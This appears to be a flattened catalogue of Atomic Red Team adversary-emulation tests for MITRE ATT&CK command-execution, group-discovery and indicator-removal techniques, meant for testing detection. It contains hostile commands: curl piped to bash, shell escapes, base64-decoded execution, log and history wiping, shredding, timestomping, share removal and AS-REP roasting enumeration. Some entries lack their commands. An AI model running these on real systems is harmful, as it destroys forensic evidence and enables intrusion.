Description: Writes text to a file and displays the results. This test is intended to emulate the dropping of a malicious file to disk.
Cleanup:
del "%TEMP%\test.bin" >nul 2>&1
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Suspicious Execution via Windows Command Shell
%LOCALAPPDATA:~-3,1%md /c echo Hello, from CMD! > hello.txt & type hello.txt
Description: Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Simulate BlackByte Ransomware Print Bombing
cmd /c "for /l %x in (1,1,75) do start wordpad.exe /p ..\ExternalPayloads\T1059_003note.txt" | out-null
Description: This test attempts to open a file a specified number of times in Wordpad, then prints the contents.
It is designed to mimic BlackByte ransomware's print bombing technique, where tree.dll, which contains the ransom note, is opened in Wordpad 75 times and then printed.
See https://redcanary.com/blog/blackbyte-ransomware/.
Prereq: File to print must exist on disk at specified location (..\ExternalPayloads\T1059_003note.txt)
if (test-path "..\ExternalPayloads\T1059_003note.txt"){exit 0} else {exit 1}
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Command Prompt read contents from CMD file and execute
cmd /r cmd<"T1059.003\src\t1059.003_cmd.cmd"
Description: Simulate Raspberry Robin using the "standard-in" command prompt feature cmd `/R <` to read and execute a file via cmd.exe.
See https://redcanary.com/blog/raspberry-robin/.
Prereq: CMD file must exist on disk at specified location (T1059.003\src\t1059.003_cmd.cmd)
if (Test-Path "T1059.003\src\t1059.003_cmd.cmd") {exit 0} else {exit 1}
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Command prompt writing script to file then executes it
Description: Simulate DarkGate malware's second stage by writing a VBScript to disk directly from the command prompt, then executing it.
The script will execute 'whoami' then exit.
Cleanup:
del "AtomicTest.vbs" >nul 2>&1
T1059.004 - Command and Scripting Interpreter: Bash
Create and Execute Bash Shell Script
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
sh /tmp/art.sh
Description: Creates and executes a simple sh script.
Cleanup:
rm /tmp/art.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Cleanup:
rm /tmp/art-fish.txt
T1059.004 - Command and Scripting Interpreter: Bash
Description: AutoSUID is an open-source project whose main idea is to automate harvesting SUID executable files and to find a way to escalate privileges further.
Prereq: AutoSUID must exist on disk at specified location (T1059.004/src/AutoSUID.sh)
if [ -f T1059.004/src/AutoSUID.sh ]; then exit 0; else exit 1; fi;
Cleanup:
rm -rf T1059.004/src/AutoSUID.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: LinEnum is a bash script that performs discovery commands for accounts, processes, kernel version, applications and services, and uses the information from these commands to present the operator with ways of escalating privileges or further exploiting the targeted host.
Prereq: LinEnum must exist on disk at specified location (T1059.004/src/LinEnum.sh)
if [ -f T1059.004/src/LinEnum.sh ]; then exit 0; else exit 1; fi;
Cleanup:
rm -rf T1059.004/src/LinEnum.sh
T1059.004 - Command and Scripting Interpreter: Bash
Description: An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands create a temp file and place a pointer to it in the variable $TMPFILE, echo the string id into it, and then execute the file using bash, which results in the id command being executed.
Cleanup:
rm $TMPFILE
unset TMPFILE
T1059.004 - Command and Scripting Interpreter: Bash
What shell is running
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
Description: An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
T1059.004 - Command and Scripting Interpreter: Bash
What shells are available
cat /etc/shells
Description: An adversary may want to discover which shells are available so that they might switch to one of them and tailor their attacks to suit that shell. The following command will discover what shells are available on the host.
T1059.004 - Command and Scripting Interpreter: Bash
Command line scripts
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
Description: An adversary may type elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out "Atomic Red Team was here!".
T1059.004 - Command and Scripting Interpreter: Bash
Description: An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64-encode the text string id, then base64-decode the string, then pipe it as a command to bash, which results in the id command being executed.
T1059.004 - Command and Scripting Interpreter: Bash
Change login shell
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
Description: An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test creates an art user with a /bin/bash shell, changes the user's shell to sh, then deletes the art user.
Prereq: chsh - change login shell, must be installed
if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
Cleanup:
[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
T1059.004 - Command and Scripting Interpreter: Bash
Environment variable scripts
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
Description: An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash.
Cleanup:
unset ART
T1059.004 - Command and Scripting Interpreter: Bash
Detecting pipe-to-shell
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh |bash
ls -la /tmp/art.txt
Description: An adversary may develop a useful utility, or subvert the CI/CD pipeline of a legitimate utility developer, that requires or suggests installing the utility by piping a curl download directly into bash. Of course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively run extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second time piping it into bash, which executes the echo command.
Prereq: Check if curl is installed on the machine.
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
rm /tmp/art.txt
T1059.004 - Command and Scripting Interpreter: Bash
Current kernel information enumeration
uname -srm
Description: An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
T1059.004 - Command and Scripting Interpreter: Bash
Shell Creation using awk command
awk 'BEGIN {system("/bin/sh &")}'
Description: In awk the BEGIN rule runs before any input record is read or interpreted. This way a shell can be created and used to break out from restricted environments with the awk command.
Reference - https://gtfobins.github.io/gtfobins/awk/#shell
T1059.004 - Command and Scripting Interpreter: Bash
Description: cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell.
Reference - https://gtfobins.github.io/gtfobins/cpan/
T1059.004 - Command and Scripting Interpreter: Bash
Shell Creation using busybox command
busybox sh &
Description: BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell.
Reference - https://gtfobins.github.io/gtfobins/busybox/
T1059.004 - Command and Scripting Interpreter: Bash
emacs spawning an interactive system shell
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
Description: emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Prereq: Check if emacs is installed on the machine.
if [ -x "$(command -v emacs)" ]; then echo "emacs is installed"; else echo "emacs is NOT installed"; exit 1; fi
T1059.005 - Command and Scripting Interpreter: Visual Basic
Visual Basic script execution to gather local computer information
Description: Visual Basic execution test, execute vbscript via PowerShell.
When successful, system information will be written to $env:TEMP\T1059.005.out.txt.
Prereq: Sample script must exist on disk at specified location (T1059.005\src\sys_info.vbs)
if (Test-Path "T1059.005\src\sys_info.vbs") {exit 0} else {exit 1}
Description: This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution a message box will pop up displaying "ART T1059.005".
A note regarding this module: due to the way that this module utilizes "ScriptControl", a 64-bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
Prereq: The 64-bit version of Microsoft Office must be installed
Description: This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory, then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that memory location to a file stored at $env:TEMP\atomic_t1059_005_test_output.bin.
Description: Create a Python file (.py), then compile it to binary (.pyc), that downloads an external malicious script and then executes it locally using the supplied executor and arguments.
Prereq: Requires Python
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
Cleanup:
rm T1059.006.pyc T1059.006.py T1059.006-payload
T1059.006 - Command and Scripting Interpreter: Python
Python pty module and spawn function used to spawn sh or bash
which_python=$(which python || which python3 || which python3.9 || which python2)
$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
Description: Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
Prereq: Verify if python is in the environment variable path and attempt to import requests library.
which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V
$which_python -c 'import requests' 2>/dev/null; echo $?
T1059.007 - Command and Scripting Interpreter: JavaScript
JScript execution to gather local computer information via cscript
Description: JScript execution test, execute JScript via cscript command. When successful, system information will be written to $env:TEMP\T1059.007.out.txt
Prereq: Sample script must exist on disk at specified location (T1059.007\src\sys_info.js)
if (Test-Path "T1059.007\src\sys_info.js") {exit 0} else {exit 1}
Cleanup:
del %tmp%\T1059.007.out.txt >nul 2>&1
T1059.007 - Command and Scripting Interpreter: JavaScript
JScript execution to gather local computer information via wscript
wscript "T1059.007\src\sys_info.js"
Description: JScript execution test, execute JScript via wscript command. When successful, system information will be shown with four message boxes.
Prereq: Sample script must exist on disk at specified location (T1059.007\src\sys_info.js)
if (Test-Path "T1059.007\src\sys_info.js") {exit 0} else {exit 1}
T1059.010 - Command and Scripting Interpreter: AutoHotKey & AutoIT
Description: An adversary may attempt to execute a malicious script using AutoHotKey software instead of a regular interpreter like PowerShell or cmd. A message box will be displayed and Calculator will pop up when the script is executed successfully.
Prereq: AutoHotKey executable file must exist on disk at the specified location (..\ExternalPayloads\ahk\AutoHotKeyU64.exe)
Description: An adversary may attempt to execute a suspicious or malicious script using AutoIt software instead of a regular interpreter like PowerShell or cmd. Calculator will pop up when the script is executed successfully.
Prereq: AutoIt executable file must exist on disk at the specified location (C:\Program Files (x86)\AutoIt3\AutoIt3.exe)
T1069.001 - Permission Groups Discovery: Local Groups
Permission Groups Discovery (Local)
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi;
if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi;
if [ -x "$(command -v id)" ]; then id; else echo "id is missing from the machine. skipping..."; fi;
if [ -x "$(command -v getent)" ]; then getent group; else echo "getent is missing from the machine. skipping..."; fi;
cat /etc/group
Description: Permission Groups Discovery
T1069.001 - Permission Groups Discovery: Local Groups
Basic Permission Groups Discovery Windows (Local)
net localgroup
net localgroup "Administrators"
Description: Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
Description: Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
Description: This module runs the Windows executable of SharpHound in order to remotely list members of the local Administrators group (SAMR).
Prereq: SharpHound binary must exist on disk and at specified location (..\ExternalPayloads\SharpHound.exe). And the computer must be domain joined (implicit authentication).
T1069.001 - Permission Groups Discovery: Local Groups
Wmic Group Discovery
wmic group get name
Description: Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information about local groups on the system will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
WMIObject Group Discovery
Get-WMIObject Win32_Group
Description: Utilizing the PowerShell cmdlet Get-WMIObject to enumerate local groups on the endpoint. Upon execution, information about local groups on the system will be displayed.
T1069.001 - Permission Groups Discovery: Local Groups
Permission Groups Discovery for Containers- Local Groups
Description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
Prereq: Verify docker is installed.
which docker
Prereq: Verify docker service is running.
sudo systemctl status docker --no-pager
Cleanup:
docker stop t1069_container
docker rmi -f t1069
T1069.002 - Permission Groups Discovery: Domain Groups
Basic Permission Groups Discovery Windows (Domain)
net localgroup
net group /domain
net group "enterprise admins" /domain
net group "domain admins" /domain
Description: Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Permission Groups Discovery PowerShell (Domain)
get-ADPrincipalGroupMembership $env:USERNAME | select name
Description: Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Elevated group enumeration using net group (Domain)
net groups "Account Operators" /domain
net groups "Exchange Organization Management" /domain
net group "BUILTIN\Backup Operators" /domain
net group "Domain Admins" /domain
Description: Runs the "net group" command, including command aliases and loose typing, to simulate enumeration/discovery of high value domain groups. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Find machines where user has local admin access (PowerView)
Description: Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Find local admins on all machines in domain (PowerView)
Description: Enumerates members of the local Administrators groups across all machines in the domain. Upon execution, information about each machine will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Description: Takes a computer and determines who has admin rights over it through GPO enumeration. Upon execution, information about the machine will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Users Not Requiring Pre Auth (ASRepRoast)
get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}
Description: When successful, accounts that do not require Kerberos pre-auth will be returned.
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented in use by ransomware actors enumerating Active Directory groups.
Reference: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Active Directory Groups with Get-AdGroup
Get-AdGroup -Filter *
Description: The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
T1069.002 - Permission Groups Discovery: Domain Groups
Enumerate Active Directory Groups with ADSISearcher
Description: The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory.
Upon successful execution a listing of groups will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
T1069.002 - Permission Groups Discovery: Domain Groups
Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)
Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
Description: When successful, accounts that do not require kerberos pre-auth will be returned.
Reference: https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Description: Utilizing PowerView, run Get-DomainGroupMember to identify domain users. Upon execution, progress and info about groups within the domain being scanned will be displayed.
T1069.002 - Permission Groups Discovery: Domain Groups
Description: Output information from Active Directory to a specified file. [Ldifde](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731033(v=ws.11)) is a CLI tool for creating, modifying and deleting directory objects.
The test is derived from the CISA report on Volt Typhoon. Reference: https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF
Prereq: PowerShell ActiveDirectory Module must be installed
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Clear Logs
wevtutil cl System
Description: Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Description: Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs.
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.
T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
Description: This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system.
Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error.
Description: This test truncates the system log files using the truncate utility with the (-s 0) parameter, which sets the file size to zero, thus emptying the file content.
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Truncate system log files via truncate utility (freebsd)
Description: This test truncates the system log files using the truncate utility with the (-s 0 or --size=0) parameter, which sets the file size to zero, thus emptying the file content.
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete log files via cat utility by appending /dev/null or /dev/zero
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=/var/log/system.log #log file filled with null bytes(zeros)
Description: The first sub-test truncates the log file to zero bytes via /dev/null, and the second sub-test fills the log file with null bytes (zeroes) via /dev/zero, using the cat and dd utilities.
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
cat /dev/null > /var/log/messages #truncating the file to zero bytes
cat /dev/zero > /var/log/messages #log file filled with null bytes(zeros)
Description: The first sub-test truncates the log file to zero bytes via /dev/null, and the second sub-test fills the log file with null bytes (zeroes) via /dev/zero, using the cat utility.
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Description: This test reads the real-time system log file and writes an empty string to it, thus clearing the log file without tampering with the logging process.
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files via unlink utility
sudo unlink /var/log/system.log
Description: This test deletes the system log file using the unlink utility.
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files via unlink utility (freebsd)
unlink /var/log/messages
Description: This test deletes the messages log file using the unlink utility.
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using shred utility
sudo shred -u -z -n 3 /var/log/system.log
Description: This test overwrites the contents of the log file with zero bytes (-z) using three passes (-n 3) of data, and then securely deletes the file (-u).
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Description: This test securely deletes the system log files individually and recursively using the srm utility.
Install srm using Homebrew with the command: brew install khell/homebrew-srm/srm
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
Prereq: target files must exist
stat /var/log/system.log /var/log/
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using OSAScript
osascript -e 'do shell script "rm /var/log/system.log" with administrator privileges'
Description: This test deletes the system log file using osascript via "do shell script" (sh/bash by default), which in turn spawns the rm utility; requires admin privileges
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system log files using Applescript
osascript -e 'tell application "Finder" to delete POSIX file "/var/log/system.log"'
Description: This test deletes the system log file using AppleScript (run via osascript) through the Finder application
Note: The user may be prompted to grant access to the Finder application before the command can be executed successfully as part of TCC(Transparency, Consent, and Control) Framework.
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
Prereq: target files must exist
stat /var/log/system.log
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Delete system journal logs via rm and journalctl utilities
sudo rm /var/log/journal/*  # physically deletes the journal files, not just their content
sudo journalctl --vacuum-time=0  # clears the journal while keeping the journal files in place
Description: The first sub-test deletes the journal files in the "/var/log/journal/" directory using the rm utility, and the second sub-test clears the journal by modifying the retention period of logs to zero.
Prereq: target files must exist
stat /var/log/journal
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Overwrite Linux Mail Spool
echo 0 > /var/spool/mail/root
Description: This test overwrites the Linux mail spool of a specified user. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Prereq: target files must exist
stat /var/spool/mail/root
T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs
Overwrite Linux Log
echo 0 > /var/log/secure
Description: This test overwrites the specified log. This technique was used by threat actor Rocke during the exploitation of Linux web servers.
Cleanup:
if [ "/var/log/secure" != "/var/log/secure" ] ; then rm -f /var/log/secure ; fi
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (rm)
rm ~/.bash_history
Description: Clears bash history via rm
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (echo)
echo "" > ~/.bash_history
Description: Clears bash history via echo
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (cat dev/null)
cat /dev/null > ~/.bash_history
Description: Clears bash history via cat /dev/null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (ln dev/null)
ln -sf /dev/null ~/.bash_history
Description: Clears bash history via a symlink to /dev/null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear Bash history (truncate)
truncate -s0 ~/.bash_history
Description: Clears bash history via truncate
T1070.003 - Indicator Removal on Host: Clear Command History
Clear history of a bunch of shells
unset HISTFILE
export HISTFILESIZE=0
history -c
Description: Clears the history of a bunch of different shell types by setting the history size to zero
T1070.003 - Indicator Removal on Host: Clear Command History
Clear and Disable Bash History Logging
set +o history
echo 'set +o history' >> ~/.bashrc
. ~/.bashrc
history -c
Description: Clears the history and disables bash history logging for the current shell and future shell sessions
Cleanup:
sed -i 's/set +o history//g' ~/.bashrc
. ~/.bashrc
set -o history
T1070.003 - Indicator Removal on Host: Clear Command History
Use Space Before Command to Avoid Logging to History
 hostname
 whoami
Description: Using a space before a command causes the command to not be logged in the Bash History file
T1070.003 - Indicator Removal on Host: Clear Command History
Description: Keeps history clear and stays out of lastlog, wtmp and btmp. ssh -T keeps the ssh client from getting a proper TTY, which is what usually gets logged in lastlog
Prereq: Install sshpass and create the user account used for executing
Description: The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if
the line should be written to the history file. Here we simply return $false so nothing gets added to
the history file for the current session.
Cleanup:
Set-PSReadLineOption -AddToHistoryHandler $null
T1070.003 - Indicator Removal on Host: Clear Command History
Clear PowerShell Session History
Clear-History
Description: This technique involves using the Clear-History cmdlet in PowerShell to remove all records of previously executed commands.
This action is often performed by attackers to eliminate traces of their activities, making incident detection and forensic
investigation more challenging. By clearing the session history, adversaries aim to obfuscate their operational footprint.
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - FreeBSD/Linux/macOS
rm -f /tmp/victim-files/T1070.004-test.txt
Description: Delete a single file from the temporary directory
Prereq: The file must exist in order to be deleted
test -e /tmp/victim-files/T1070.004-test.txt && exit 0 || exit 1
Cleanup:
rm -rf /tmp/victim-files/
T1070.004 - Indicator Removal on Host: File Deletion
Delete an entire folder - FreeBSD/Linux/macOS
rm -rf /tmp/victim-folder
Description: Recursively delete the temporary directory and all files contained within it
Prereq: The folder must exist in order to be deleted
test -e /tmp/victim-folder && exit 0 || exit 1
T1070.004 - Indicator Removal on Host: File Deletion
Overwrite and delete a file with shred
shred -u /tmp/victim-shred.txt
Description: Use the `shred` command to overwrite the temporary file and then delete it
Prereq: Check if file already exists
if [ -f "/tmp/victim-shred.txt" ]; then echo "File already exists"; else echo "File does NOT exist yet"; exit 1; fi
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - Windows cmd
del /f %temp%\deleteme_T1551.004
Description: Delete a single file from the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Prereq: The file to delete must exist on disk at specified location (%temp%\deleteme_T1551.004)
T1070.004 - Indicator Removal on Host: File Deletion
Delete an entire folder - Windows cmd
rmdir /s /q %temp%\deleteme_T1551.004
Description: Recursively delete a folder in the temporary directory using cmd.exe.
Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Prereq: The file to delete must exist on disk at specified location (%temp%\deleteme_T1551.004)
T1070.004 - Indicator Removal on Host: File Deletion
Delete a single file - Windows PowerShell
Remove-Item -path $env:TEMP\deleteme_T1551.004
Description: Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
Prereq: The file to delete must exist on disk at specified location ($env:TEMP\deleteme_T1551.004)
if (Test-Path $env:TEMP\deleteme_T1551.004) {exit 0} else {exit 1}
T1070.004 - Indicator Removal on Host: File Deletion
Description: Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
Prereq: The folder to delete must exist on disk at specified location ($env:TEMP\deleteme_folder_T1551.004)
if (Test-Path $env:TEMP\deleteme_folder_T1551.004) {exit 0} else {exit 1}
T1070.004 - Indicator Removal on Host: File Deletion
Description: This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
T1070.004 - Indicator Removal on Host: File Deletion
Description: Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run `(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count`
before and after the test to verify that the number of prefetch files decreases by 1.
T1070.004 - Indicator Removal on Host: File Deletion
Description: Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ratio.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
T1070.004 - Indicator Removal on Host: File Deletion
Clears Recycle bin via rd
rd /s /q %systemdrive%\$RECYCLE.BIN
Description: An adversary clears the recycle bin in the system partition using rd to remove traces of deleted files.
[Reference](https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/)
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Add Network Share
net use c: \\test\share
net share test=\\test\share /REMARK:"test share" /CACHE:No
Description: Add a Network Share utilizing the command_prompt
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Remove Network Share
net share \\test\share /delete
Description: Removes a Network Share utilizing the command_prompt
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Description: Administrative shares are hidden network shares created by Microsoft's Windows NT operating systems that grant system administrators
remote access to every disk volume on a network-connected system. These shares are automatically created at startup unless they have been
purposefully disabled, as is done in this Atomic test. As Microsoft puts it, "Missing administrative shares typically
indicate that the computer in question has been compromised by malicious software."
https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
T1070.005 - Indicator Removal on Host: Network Share Connection Removal
Remove Administrative Shares
for %i in (C$ IPC$ ADMIN$) do net share %i /delete
Description: Administrative shares are hidden network shares created by Microsoft's Windows NT operating systems that grant system administrators
remote access to every disk volume on a network-connected system. As Microsoft puts it, "Missing administrative shares typically
indicate that the computer in question has been compromised by malicious software."
https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/
Cleanup:
net share ADMIN$ /UNLIMITED >nul 2>&1
net share C$=C:\ >nul 2>&1
net share IPC$ >nul 2>&1
T1070.006 - Indicator Removal on Host: Timestomp
Set a file's access timestamp
touch -a -t 197001010000.00 /tmp/T1070.006-access.txt
Description: Stomps on the access timestamp of a file
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-access.txt && exit 0 || exit 1
Description: Stomps on the modification timestamp of a file
Prereq: The file must exist in order to be timestomped
test -e /tmp/T1070.006-modification.txt && exit 0 || exit 1
Cleanup:
rm -f /tmp/T1070.006-modification.txt
T1070.006 - Indicator Removal on Host: Timestomp
Set a file's creation timestamp
NOW=$(date +%m%d%H%M%Y)
date 010100001971
touch /tmp/T1070.006-creation.txt
date "$NOW"
stat /tmp/T1070.006-creation.txt
Description: Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
Description: Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
Cleanup:
rm -f /tmp/T1070.006-reference.txt
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file creation timestamp with PowerShell
Description: Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
Prereq: A file must exist at the path (..\ExternalPayloads\T1551.006_timestomp.txt) to change the creation time on
if (Test-Path "..\ExternalPayloads\T1551.006_timestomp.txt") {exit 0} else {exit 1}
T1070.006 - Indicator Removal on Host: Timestomp
Windows - Modify file last modified timestamp with PowerShell
